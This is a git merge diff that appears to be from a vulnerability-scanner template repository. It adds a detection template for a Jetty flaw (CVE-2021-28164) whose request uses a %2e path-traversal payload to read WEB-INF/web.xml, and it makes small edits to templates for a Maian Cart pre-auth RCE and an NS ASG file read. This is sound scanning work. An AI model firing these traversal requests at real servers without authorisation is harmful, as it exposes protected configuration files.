Merge pull request #1689 from nrathaus/master

CVE-2021-28164 and some fixes

cves/2021/CVE-2021-28164.yaml

@@ -0,0 +1,33 @@
+id: CVE-2021-28164
+
+info:
+  name: Jetty Authorization Before Parsing and Canonicalization
+  author: noamrathaus
+  severity: high
+  description: |
+    The default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. For example a request to /context/%2e/WEB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application.
+  reference: |
+    - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5
+    - https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty
+  tags: cve,cve2021,jetty
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/%2e/WEB-INF/web.xml"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "<web-app>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - "application/xml"

vulnerabilities/other/maian-cart-preauth-rce.yaml

@@ -55,4 +55,5 @@ requests:
     matchers:
       - type: dsl
         dsl:
-          - 'contains(body_3, "{{randstr_1}}")'
+          - 'contains(body_3, "{{randstr_1}}")'
+          - "status_code_3 == 200"

vulnerabilities/other/ns-asg-file-read.yaml

@@ -4,6 +4,7 @@ info:
   name: NS ASG Arbitrary File Read
   author: pikpikcu
   severity: high
+  reference: https://zhuanlan.zhihu.com/p/368054963
   tags: nsasg,lfi
 
 requests: